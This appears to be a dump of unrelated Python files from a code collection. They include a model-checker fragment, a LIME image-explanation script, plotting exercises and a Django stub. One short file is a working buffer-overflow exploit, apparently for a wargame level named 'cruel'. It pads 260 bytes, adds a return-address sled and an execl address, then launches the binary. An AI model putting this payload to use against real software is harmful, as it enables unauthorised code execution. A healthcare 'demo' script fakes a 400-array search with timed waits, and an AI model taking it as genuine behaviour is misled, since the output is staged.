solver.add_assertion(self.totime(pred, 0))
for it_k in range(k + 1):
for t in self.trans:
solver.add_assertion(self.totime(t, it_k))
solver.push()
if conc_model is not None:
trace = self._model2trace(conc_model, 0, k + 1,
True)
yield (trace, lback_idx, False, False)
else:
active_hints, hints_steps, hints_rfs = \
self._model2hint_comp(model, lback_idx, k + 1)
assert len(active_hints) == 0 or \
len(hints_steps) == k - lback_idx + 1
hints_region_trans, hints_assume = \
self._hint_comp2assume(active_hints, hints_steps,
lback_idx)
assert isinstance(hints_region_trans, frozenset)
assert all(isinstance(k, FNode)
for k in hints_region_trans)
assert all(k in self.i_mgr.formulae.values()
for k in hints_region_trans)
assert isinstance(hints_assume, frozenset)
assert all(isinstance(k, FNode)
for k in hints_assume)
assert all(k in self.i_mgr.formulae.values()
for k in hints_assume)
hint_assigns = {**{k: model.get_value(k)
for k in self.hint_active},
**{k if not k.is_not() else k.arg(0):
self.i_mgr.TRUE() if not k.is_not()
else self.i_mgr.FALSE()
for k in hints_region_trans}}
for step in range(lback_idx, k+2):
for s in self.hint_symbs:
timed_s = self.totime(s, step)
hint_assigns[timed_s] = model.get_value(timed_s)
loop_core = self.generaliser.generalise_path(
chain(solver.assertions, hints_assume),
model, timed_symbs[lback_idx:],
lback_idx, k + 1, assume=hint_assigns)
assert isinstance(loop_core, frozenset)
assert all(c in self.i_mgr.formulae.values()
for c in loop_core)
if __debug__:
from solver import Solver
# loop_core -> original trans
_trans = [self.totime(self._orig_trans, _time)
for _time in range(lback_idx, k + 1)]
_trans = self.i_mgr.And(_trans)
with Solver(self.i_env) as _solver:
_solver.add_assertion(self.i_mgr.Not(_trans))
for c in loop_core:
_solver.add_assertion(c)
for pred in assign2fnodes(self.i_env,
hint_assigns):
_solver.add_assertion(pred)
_solver.add_assertions(hints_region_trans)
sat = _solver.solve()
assert sat is False
abst_states, abst_trans = \
self.generaliser.curr_next_preds(
loop_core, lback_idx, k + 1, model)
hints_states, hints_trans = \
self.generaliser.curr_next_preds(
hints_region_trans, lback_idx, k + 1,
model)
trace = self._model2trace(model, 0, k + 1, True)
assert isinstance(trace, list), trace
assert len(trace) == k + 2
assert isinstance(abst_states, list)
assert isinstance(abst_trans, list)
assert len(abst_states) == \
len(trace) - lback_idx
assert len(abst_trans) == len(abst_states) - 1
assert isinstance(hints_states, list)
assert isinstance(hints_trans, list)
assert len(hints_states) == \
len(trace) - lback_idx
assert len(hints_trans) == len(hints_states) - 1
yield (trace, lback_idx,
# abst states and trans
([frozenset(self.o_norm(s) for s in state)
for state in abst_states],
[frozenset(self.o_norm(t) for t in trans)
for trans in abst_trans]),
# hints, hints states, trans and rf.
([h.to_env(self.o_env)
for h in active_hints],
[frozenset(self.o_norm(s) for s in state)
for state in hints_states],
[frozenset(self.o_norm(t) for t in trans)
for trans in hints_trans],
[(rf.to_env(self.o_env), s, e)
for rf, s, e in hints_rfs]))
del trace
ref = self._compute_refinement(model, lback_idx, k + 1,
hints_region_trans,
hints_assume, loop_core)
refinements.append(ref)
solver.add_assertion(ref)
solver.pop()
def _try_concretize(self, solver, last: int, lback: int):
assert isinstance(last, int)
assert last >= 0
assert isinstance(lback, int)
assert lback >= 0
assert lback < last
assert all(s in self.i_mgr.formulae.values() for s in self.all_symbs)
model = None
solver.push()
# ignore additional symbols introduced by Hints.
for s in self.orig_symbs:
last_s = self.totime(s, last)
lback_s = self.totime(s, lback)
if s.symbol_type().is_bool_type():
solver.add_assertion(self.i_mgr.Iff(last_s, lback_s))
else:
solver.add_assertion(self.i_mgr.Equals(last_s, lback_s))
if solver.solve() is True:
model = solver.get_model()
solver.pop()
return model
def _get_lback_index(self, model, last) -> int:
"""Search for lback index
self._in_loop becomes true in the second state of the loop
"""
assert last > 0
# last state cannot be loop-back.
assert model.get_value(self.totime(self._in_loop, last)).is_true()
assert model.get_value(self.totime(self._in_loop, 0)).is_false()
idx = last - 1
while model.get_value(self.totime(self._in_loop, idx)).is_true():
idx -= 1
assert idx >= 0
assert model.get_value(self.totime(self._in_loop, idx + 1)).is_true()
assert model.get_value(self.totime(self._in_loop, idx)).is_false()
assert model.get_value(self.totime(self.start_loop, idx)).is_true()
return idx
def _model2trace(self, model, first: int, last: int,
to_out: bool = False) -> List[Dict[FNode, FNode]]:
assert isinstance(first, int)
assert isinstance(last, int)
assert 0 <= first < last, (first, last)
trace: List[Dict[FNode, FNode]] = [{} for _ in range(first, last + 1)]
for c_time in range(first, last + 1):
idx = c_time - first
for s in self.orig_symbs if to_out else self.all_symbs:
timed_s = self.totime(s, c_time)
v = model.get_value(timed_s)
if to_out:
s = self.o_norm(s)
v = self.o_norm(v)
assert s not in trace[idx], str(s)
trace[idx][s] = v
return trace
def _model2hint_comp(self, model, first: int, last: int) \
-> Tuple[List[Hint],
List[List[Tuple[int, bool, TransType]]],
List[Tuple[RankFun, int, int]]]:
"""returns list of active Hints and sequence of `states`.
For each state reports location of each active hint and type of
the transition to reach the following state"""
assert isinstance(first, int)
assert isinstance(last, int)
assert hasattr(model, "get_value")
assert 0 <= first < last
assert all(h.ts_lvals is not None for h in self.hints)
assert all(h.ts_loc_symbs is not None for h in self.hints)
# set of active hints should be constant in the loop.
assert all(all(model.get_value(self.totime(is_active, step)).is_true()
for step in range(first, last+1)) or
all(model.get_value(self.totime(is_active, step)).is_false()
for step in range(first, last+1))
for idx, is_active in enumerate(self.hint_active))
# hint_active predicates should be frozen.
assert all(self.totime(act, first) == act for act in self.hint_active)
# Filter active hints
active_hints = [self.hints[idx]
for idx, is_active in enumerate(self.hint_active)
if model.get_value(is_active).is_true()]
# No hints used in the current trace.
if len(active_hints) == 0:
return [], [], []
locval2idx_lst = [{val: idx for idx, val in enumerate(h.ts_lvals)}
for h in active_hints]
x_loc_idxs: List[int] = []
for h, locval2idx in zip(active_hints, locval2idx_lst):
val = self.i_mgr.And(
s if model.get_value(self.totime(s, first)).is_true() else
self.i_mgr.Not(s)
for s in h.ts_loc_symbs)
assert val in locval2idx
x_loc_idxs.append(locval2idx[val])
hints_steps = [[] for _ in range(first, last)]
hints_rfs = []
last_rf = None
last_rf_start_idx = None
for curr, step in zip(hints_steps, range(first, last)):
# fill curr with info of active_hints
loc_idxs = x_loc_idxs
x_loc_idxs = []
assert len(active_hints) == len(locval2idx_lst)
assert len(active_hints) == len(loc_idxs)
for h, locval2idx, loc_idx in zip(active_hints, locval2idx_lst,
loc_idxs):
# find location of h at next step
val = self.i_mgr.And(
s if model.get_value(self.totime(s, step + 1)).is_true()
else self.i_mgr.Not(s) for s in h.ts_loc_symbs)
assert val in locval2idx
x_loc_idx = locval2idx[val]
assert isinstance(x_loc_idx, int)
assert 0 <= x_loc_idx < len(h)
x_loc_idxs.append(x_loc_idx)
trans_type = None
is_ranked = False
if model.get_value(self.totime(h.t_is_stutter, step)).is_true():
trans_type = TransType.STUTTER
if h[loc_idx].rf is not None:
rf_pred = self.totime(h[loc_idx].rf.is_ranked, step)
is_ranked = model.get_value(rf_pred).is_true()
elif model.get_value(self.totime(h.t_is_ranked, step)).is_true():
trans_type = TransType.RANKED
is_ranked = True
rf = h[loc_idx].rf
assert rf is not None
if model.get_value(self.totime(self.i_mgr.Not(rf.is_ranked),
step + 1)).is_true():
if not last_rf:
assert last_rf_start_idx is None
last_rf = rf
last_rf_start_idx = step - first
assert last_rf is not None
assert last_rf_start_idx is not None
assert 0 <= last_rf_start_idx <= step - first
hints_rfs.append((last_rf, last_rf_start_idx,
step - first))
last_rf = None
last_rf_start_idx = None
else:
assert last_rf is None or last_rf == rf
last_rf = rf
last_rf_start_idx = step - first + 1
else:
assert model.get_value(self.totime(h.t_is_progress, step)).is_true()
trans_type = TransType.PROGRESS
curr.append((loc_idx, is_ranked, trans_type))
if __debug__:
assert step < last
# check model is in the identified restricted region.
formula = self.totime(h[loc_idx].region, step)
assert model.get_value(formula).is_true()
formula = self.totime(h[loc_idx].assume, step)
assert model.get_value(formula).is_true()
formula = self.totime(h[x_loc_idx].region, step + 1)
assert model.get_value(formula).is_true()
formula = self.totime(h[x_loc_idx].assume, step + 1)
assert model.get_value(formula).is_true()
# check that the identified transition holds in model.
if trans_type == TransType.STUTTER:
assert x_loc_idx == loc_idx
trans = h[loc_idx].stutterT
formula = self.totime(trans, step)
assert model.get_value(formula).is_true()
if h[loc_idx].rf is not None:
rf = h[loc_idx].rf.expr
formula = self.i_mgr.Equals(self.totime(rf, step),
self.totime(rf, step + 1))
assert model.get_value(formula).is_true()
elif trans_type == TransType.RANKED:
assert h[loc_idx].rf is not None
assert x_loc_idx == loc_idx
trans = h[loc_idx].rankT
formula = self.totime(trans, step)
assert model.get_value(formula).is_true()
formula = self.totime(h[loc_idx].rf.progress_pred(), step)
assert model.get_value(formula).is_true()
else:
assert trans_type == TransType.PROGRESS
assert x_loc_idx in h[loc_idx].dsts
trans = self.totime(h[loc_idx].progress(x_loc_idx), step)
assert model.get_value(trans).is_true()
if h[x_loc_idx].rf is not None:
ranked = self.totime(
self.i_mgr.Not(h[loc_idx].rf.is_ranked),
step)
assert model.get_value(ranked).is_true()
# end debug
return active_hints, hints_steps, hints_rfs
def _hint_comp2assume(self, hints: List[Hint],
steps: List[List[Tuple[int, bool, TransType]]],
first: int) -> Tuple[FrozenSet[FNode],
FrozenSet[FNode]]:
"""Build dictionary from predicates to the corresponding truth assignment
as prescribed by the selected hints."""
assert all(isinstance(h, Hint) for h in hints)
assert all(isinstance(s, list) for s in steps)
assert all(len(s) == len(hints) for s in steps)
assert all(isinstance(s, tuple) for step in steps for s in step)
assert all(len(s) == 3 for step in steps for s in step)
assert all(isinstance(s[0], int) for step in steps for s in step)
assert all(isinstance(s[1], bool) for step in steps for s in step)
assert all(isinstance(s[2], TransType) for step in steps for s in step)
assert isinstance(first, int)
assert first >= 0
if len(hints) == 0:
return frozenset(), frozenset()
def assign_true(pred: FNode, res: Set[FNode]):
assert isinstance(pred, FNode)
assert isinstance(res, set)
preds = [pred]
while preds:
pred = preds.pop()
if pred.is_and():
preds.extend(pred.args())
elif pred.is_not():
assign_false(pred.arg(0), res)
elif not pred.is_true():
assert not pred.is_false()
res.add(self.cn(pred))
def assign_false(pred: FNode, res: Set[FNode]):
assert isinstance(pred, FNode)
assert isinstance(res, set)
preds = [pred]
while preds:
pred = preds.pop()
if pred.is_or():
preds.extend(pred.args())
elif pred.is_not():
assign_true(pred.arg(0), res)
elif not pred.is_false():
assert not pred.is_true()
if pred.is_lt() or pred.is_le():
res.add(self.cn(not_rel(self.i_env, pred)))
else:
res.add(self.cn(self.i_mgr.Not(pred)))
res_regions_trans: Set[FNode] = set()
res_assumes: Set[FNode] = set()
for step_idx, step in enumerate(steps):
c_time = step_idx + first
x_step_idx = (step_idx + 1) % len(steps)
for hint_idx, (hint, (loc_idx, is_ranked, trans_t)) in enumerate(
zip(hints, step)):
assert isinstance(hint, Hint)
assert isinstance(loc_idx, int)
assert isinstance(trans_t, TransType)
loc = hint[loc_idx]
assign_true(self.totime(loc.region, c_time), res_regions_trans)
assign_true(self.totime(loc.assume, c_time), res_assumes)
if loc.rf is not None:
if is_ranked:
assign_true(self.totime(loc.rf.is_ranked, c_time),
res_regions_trans)
else:
assign_false(self.totime(loc.rf.is_ranked, c_time),
res_regions_trans)
x_loc_idx = steps[x_step_idx][hint_idx][0]
assert isinstance(x_loc_idx, int)
if trans_t == TransType.PROGRESS:
trans = loc.progress(x_loc_idx)
elif trans_t == TransType.STUTTER:
trans = loc.stutterT
else:
assert trans_t == TransType.RANKED
trans = loc.rankT
assert trans is not None
assert isinstance(trans, FNode)
assert not trans.is_false()
assert trans in self.i_mgr.formulae.values()
assign_true(self.totime(trans, c_time), res_regions_trans)
assert all(self.cn(p) == p for p in res_regions_trans)
assert all(self.cn(p) == p for p in res_assumes)
return frozenset(res_regions_trans), frozenset(res_assumes)
def _compute_refinement(self, model, lback_idx: int, last_idx: int,
hints_region_trans: FrozenSet[FNode],
hints_assume: FrozenSet[FNode],
loop_core: FrozenSet[FNode]) -> FNode:
assert hasattr(model, "get_value")
assert isinstance(lback_idx, int)
assert isinstance(last_idx, int)
assert 0 <= lback_idx < last_idx
assert isinstance(hints_region_trans, frozenset)
assert isinstance(hints_assume, frozenset)
assert all(isinstance(p, FNode) for p in hints_region_trans)
assert all(p in self.i_mgr.formulae.values()
for p in hints_region_trans)
assert all(self.cn(p) == p for p in hints_region_trans)
assert all(1 <= len(ExprAtTime.collect_times(self.i_mgr, p)) <= 2
for p in hints_region_trans)
assert all(max(ExprAtTime.collect_times(self.i_mgr, p)) <= last_idx
for p in hints_region_trans)
assert all(model.get_value(p).is_true() for p in hints_region_trans)
assert all(isinstance(p, FNode) for p in hints_assume)
assert all(p in self.i_mgr.formulae.values() for p in hints_assume)
assert all(self.cn(p) == p for p in hints_assume)
assert all(1 <= len(ExprAtTime.collect_times(self.i_mgr, p)) <= 2
for p in hints_assume)
assert all(max(ExprAtTime.collect_times(self.i_mgr, p)) <= last_idx
for p in hints_assume)
assert all(model.get_value(p).is_true() for p in hints_assume)
assert isinstance(loop_core, frozenset)
assert all(isinstance(p, FNode) for p in loop_core)
assert all(p in self.i_mgr.formulae.values() for p in loop_core)
assert all(self.cn(p) == p for p in loop_core)
assert all(1 <= len(ExprAtTime.collect_times(self.i_mgr, p)) <= 2
for p in loop_core)
assert all(max(ExprAtTime.collect_times(self.i_mgr, p)) <= last_idx
for p in loop_core)
assert all(model.get_value(p).is_true() for p in loop_core)
def to_ignore(s: FNode):
if s.is_not():
s = s.arg(0)
assert not s.is_not()
return s.is_symbol() and (s.symbol_name().startswith("_J") or
s.symbol_name().startswith("_EL_"))
res = set(hints_region_trans | hints_assume)
res.update(p for p in loop_core if not to_ignore(p))
if not loop_core:
i_get_atoms = self.i_env.ao.get_atoms
atms = frozenset(atm for atm in i_get_atoms(self._orig_trans)
if not to_ignore(atm))
for idx in range(lback_idx, last_idx):
for atm in atms:
assert not atm.is_not()
atm = self.totime(atm, idx)
assert 1 <= len(ExprAtTime.collect_times(self.i_mgr, atm)) <= 2
assert max(ExprAtTime.collect_times(self.i_mgr, atm)) <= last_idx
if model.get_value(atm).is_false():
atm = self.i_mgr.Not(atm)
assert model.get_value(atm).is_true()
res.add(atm)
for atm in atms:
atm = self.totime(atm, last_idx)
if max(ExprAtTime.collect_times(self.i_mgr, atm)) <= last_idx:
if model.get_value(atm).is_false():
atm = self.i_mgr.Not(atm)
assert model.get_value(atm).is_true()
res.add(atm)
assert all(not s.symbol_name().startswith("_J") and
not s.symbol_name().startswith("_EL_")
for pred in res
for s in self.i_env.fvo.get_free_variables(pred))
assert all(model.get_value(p).is_true() for p in res)
return self.i_mgr.Not(self.i_mgr.And(res))
|
13,194 | 93148e7999a00210532c973101191d9a82816508 | import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
import os, json
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models, transforms
from torch.autograd import Variable
from PIL import Image
from models import get_net
from lime import lime_image
from skimage.segmentation import mark_boundaries
def get_image(path):
with open(os.path.abspath(path), 'rb') as f:
with Image.open(f) as img:
return img.convert('RGB')
def get_pil_transform():
transf = transforms.Compose([
transforms.Resize((256, 256)),
transforms.CenterCrop(224)
])
return transf
def get_preprocess_transform():
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transf = transforms.Compose([
transforms.ToTensor(),
normalize
])
return transf
def batch_predict(images):
model.eval()
batch = torch.stack(tuple(preprocess_transform(i) for i in images), dim=0)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model.to(device)
batch = batch.to(device)
logits = model(batch)
#probs = torch.sigmoid(logits)
# if you don't pass 2 probs, LIME always classifies all examples in the coyote category
probs = torch.cat((1-torch.sigmoid(logits), torch.sigmoid(logits)), 1)
return probs.detach().cpu().numpy()
def generate_explanations(images, outfile, num_samples, num_features, seed=123):
img = get_image(images[0])
test_pred = batch_predict([pill_transf(img), pill_transf(img)])
print("test prediction logic", test_pred)
fig = plt.figure(constrained_layout=True, figsize=(5, 20))
spec = gridspec.GridSpec(ncols=3, nrows=len(images), figure=fig)
i = 0
for img in images:
img = get_image(img)
explainer = lime_image.LimeImageExplainer(feature_selection='highest_weights', verbose=True, random_state=123)
explanation = explainer.explain_instance(np.array(pill_transf(img)),
batch_predict, # classification function
top_labels=1,
hide_color=0,
num_samples=num_samples, # number of images that will be sent to classification function
random_seed=seed)
print("label: ", explanation.top_labels[0])
temp, mask = explanation.get_image_and_mask(explanation.top_labels[0],
positive_only=True, negative_only=False,
num_features=num_features[i], hide_rest=True)
img_boundry1 = mark_boundaries(temp/255.0, mask)
temp, mask = explanation.get_image_and_mask(explanation.top_labels[0],
positive_only=False, negative_only=True,
num_features=num_features[i], hide_rest=True)
img_boundry2 = mark_boundaries(temp/255.0, mask)
f_ax1 = fig.add_subplot(spec[i, 0], xticks=[], yticks=[])
f_ax2 = fig.add_subplot(spec[i, 1], xticks=[], yticks=[])
f_ax3 = fig.add_subplot(spec[i, 2], xticks=[], yticks=[])
f_ax1.imshow(img)
f_ax2.imshow(img_boundry1)
f_ax3.imshow(img_boundry2)
i += 1
plt.savefig(outfile, dpi=300, bbox_inches='tight', pad_inches=0) # To save figure
plt.show() # To show figure
if __name__ == "__main__":
#model_filename="./models/wildcam_1501_0.001_40_10000.0_IRM.pth"
#model_filename="./models/wildcam_1501_0.001_0_0.0_ERM.pth"
#model_filename="./models/wildcam_denoised_121_0.001_40_10000.0_IRM.pth"
model_filename="./models/wildcam_denoised_121_0.001_0_0.0_ERM.pth"
net = get_net("WILDCAM")
model = net(n_classes=2)
print("loading model")
model.load_state_dict(torch.load(model_filename, map_location="cpu"))
model.to("cpu")
pill_transf = get_pil_transform()
preprocess_transform = get_preprocess_transform()
'''
generate_explanations(images =
[
#'../../../data/wildcam_subset_denoised/test/coyote/5903ccce-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/59373454-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/58adc310-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/58c7efed-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/59279c0b-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/5903cc2e-23d2-11e8-a6a3-ec086b02610b.jpg'
'../../../data/wildcam_subset_denoised/test/coyote/5865e36a-23d2-11e8-a6a3-ec086b02610b.jpg'
],
outfile='./figures/IRM_denoised_coyote_explanation.png',
num_samples=1000, num_features=[10], seed=123)
'''
'''
generate_explanations(images =
[
#'../../../data/wildcam_subset_denoised/test/coyote/5903ccce-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/59373454-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/58adc310-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/58c7efed-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/59279c0b-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/coyote/5903cc2e-23d2-11e8-a6a3-ec086b02610b.jpg'
'../../../data/wildcam_subset_denoised/test/coyote/5865e36a-23d2-11e8-a6a3-ec086b02610b.jpg'
],
outfile='./figures/ERM_denoised_coyote_explanation.png',
num_samples=1000, num_features=[10], seed=123)
'''
'''
generate_explanations(images =
[
#'../../../data/wildcam_subset_denoised/test/raccoon/593a4e8a-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/5879d289-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/58629252-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/591fd104-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/58a8a170-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/raccoon/5892b697-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/raccoon/58e40d0c-23d2-11e8-a6a3-ec086b02610b.jpg'
'../../../data/wildcam_subset_denoised/test/raccoon/58e2820f-23d2-11e8-a6a3-ec086b02610b.jpg'
],
outfile='./figures/IRM_denoised_raccoon_explanation.png',
num_samples=1000, num_features=[20], seed=123)
'''
'''
generate_explanations(images =
[
#'../../../data/wildcam_subset_denoised/test/raccoon/593a4e8a-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/5879d289-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/58629252-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/591fd104-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/58a8a170-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/5892b697-23d2-11e8-a6a3-ec086b02610b.jpg',
#'../../../data/wildcam_subset_denoised/test/raccoon/58af7610-23d2-11e8-a6a3-ec086b02610b.jpg'
#'../../../data/wildcam_subset_denoised/test/raccoon/58e40d0c-23d2-11e8-a6a3-ec086b02610b.jpg'
'../../../data/wildcam_subset_denoised/test/raccoon/58732ea2-23d2-11e8-a6a3-ec086b02610b.jpg'
],
outfile='./figures/ERM_denoised_raccoon_explanation.png',
num_samples=1000, num_features=[20], seed=123)
'''
'''
generate_explanations(images =
[
'../../../data/wildcam_subset_denoised/test/coyote/5903ccce-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/59373454-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/58c7efed-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/58adc310-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/59279c0b-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/5903cc2e-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/5865e36a-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/593a4e8a-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/5879d289-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/58629252-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/591fd104-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/58a8a170-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/58e40d0c-23d2-11e8-a6a3-ec086b02610b.jpg'
],
outfile='./figures/IRM_denoised_results.png',
num_samples=1000, num_features=[10, 10, 10, 10, 10, 5, 10, 20, 10, 5, 20, 10, 20], seed=123)
'''
generate_explanations(images =
[
'../../../data/wildcam_subset_denoised/test/coyote/5903ccce-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/59373454-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/58c7efed-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/58adc310-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/59279c0b-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/5903cc2e-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/coyote/5865e36a-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/593a4e8a-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/5879d289-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/58629252-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/591fd104-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/58a8a170-23d2-11e8-a6a3-ec086b02610b.jpg',
'../../../data/wildcam_subset_denoised/test/raccoon/58e40d0c-23d2-11e8-a6a3-ec086b02610b.jpg'
],
outfile='./figures/ERM_denoised_results.png',
num_samples=1000, num_features=[10, 10, 10, 10, 10, 5, 10, 20, 10, 5, 20, 10, 20], seed=123)
|
13,195 | 29cf8be26357c806e49d5c73116d3fd956dfe522 | import math
def mass_fuel_calculator(input):
return math.floor(input / 3) - 2
# Main method
if __name__ == '__main__':
filepath = "inputList"
totalFuel = 0
with open(filepath) as fp:
for line in fp:
totalFuel += mass_fuel_calculator(int(line))
print(int(totalFuel)) |
13,196 | 5b586d679e6c5f6aad67f69c1054c35a05b7ddf9 | """
Instructions: Complete each TODO below. The TODO's are put into sections for separate graphs. Each section
can be done with different data if desired, and if the data allows the questin to be answered. Filtering should
be done, if needed. Example data can be found at ./Data/.
License:
Copyright 2021 Douglas Bowman
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Datasets and locations can be found at .\PracticalProgramming\Session 7 - Python\Instructional Material\In-Class Exercises\Data\
# For the following TODO's, use a data set with a single x-y series
# Workable data set: Any
# TODO: Plot basic data using an appropriate plot type.
# TODO: Add an appropriate x-label, y-label, and title.
# TODO: Turn the grid on.
# TODO: Change the x-axis limits and y-axis limits to more fully show the data
# (i.e. change the limits to as much data can be seen on the plot as
# possible).
# TODO: Change the font sizes of the x-label, y-label, and title to be visible.
# Make the title fontsize bigger than the labels.
# TODO: Output the graph to a file.
# For the following TODO's, multiple x-y series will be needed to plot on the
# same graph.
# Workable data sets:
# NYC_Expense_Actuals.csv
# Inflation 1980-2020.csv
# 2020_earthquakes_4_5_plus.csv
#
# TODO: Plot 5 series using an appropriate plot type. Ensure each data series
# has a different color, as well as different markers. Different line
# styles may be used in place of markers as long as each series is
# distinguishable in black and white.
# TODO: Add a legend. Put it in an opportune place to minimize covering of
# data.
# TODO: Add an appropriate x-label, y-label, and title.
# TODO: Add an annotation to depict an abnormal event in the data.
# For the following TODO's, put each graph on it's own subplot.
# Workable data set:
# NYC_Expense_Actuals.csv
# Inflation 1980-2020.csv
# 2020_earthquakes_4_5_plus.csv
#
# TODO: Plot 5 series using an appropriate plot type. Ensure each data series
# is on its own plot in the subplot, and uses a different type of plot.
# Hint: think about plotting metadata, such as number of agencies per
# year, or how much portion of all funds the city fund has per year).
# TODO: Add an appropriate x-label, y-label, and title for each subplot.
# TODO: Reset x and y limits, as well as size and spacing, to get the data to
# show as best as possible. If multiple subplots would work better, feel
# free to create them.
# TODO: Adjust tick sizes and tick rotation as necessary to show data.
# TODO: Print the plot to a file. |
13,197 | edb87df5e388ce83ebb6cc3b28ba7aad19848707 | import pandas
import numpy
import time
def pull():
return
def main():
start_time = time.time()
excel_data_df_1 = pandas.read_excel('2012.xlsx', sheet_name= 'Sheet1')
excel_data_df_2 = pandas.read_excel('2019.xlsx', sheet_name= 'Sheet1')
print("Welcome to the HCA Healthcare IBM Technical Demo!")
print("Here we will show how Spectrum Virtualize will operate over various storage arrays in the case of a particular patient")
print("Please enter a patients name to pull all information regarding them")
x = input()
print("Searching over 400 storage arrays...")
curr_time = time.time()
while(time.time() < 5 + curr_time):
x = 5
print("Found Records of Carlson Jensen from 2012...")
print(excel_data_df_1)
while(time.time() < 12 + curr_time):
x = 5
print("Found Records of Carlson Jensen from 2019...")
print(excel_data_df_2)
print("Search complete, merging records into a homogonous storage array")
print("Carlsen Jensen complete record after pulling from 400 homogonous storage arrays:")
print(excel_data_df_2)
print("Time to complete: ")
print(time.time() - curr_time)
print("Carlson Jensen records fully merged, ready to be used for later analysis!")
return
if __name__ == "__main__":
main() |
13,198 | fdcc3e87b79171e59441e65767bd6e26d8ed8885 | import os
from struct import *
target = "/home/dark_stone/cruel"
payload = ""
payload += "A"*260
payload += "\x51\x84\x04\x08" * 7 # ret sled
payload += "\x68\x2d\x83" # execl's address
os.execv(target, [target, payload])
|
13,199 | 606f93fc23759039dcca5b6b328bd43949e5f615 | # from django.shortcuts import render
# Create your views here.
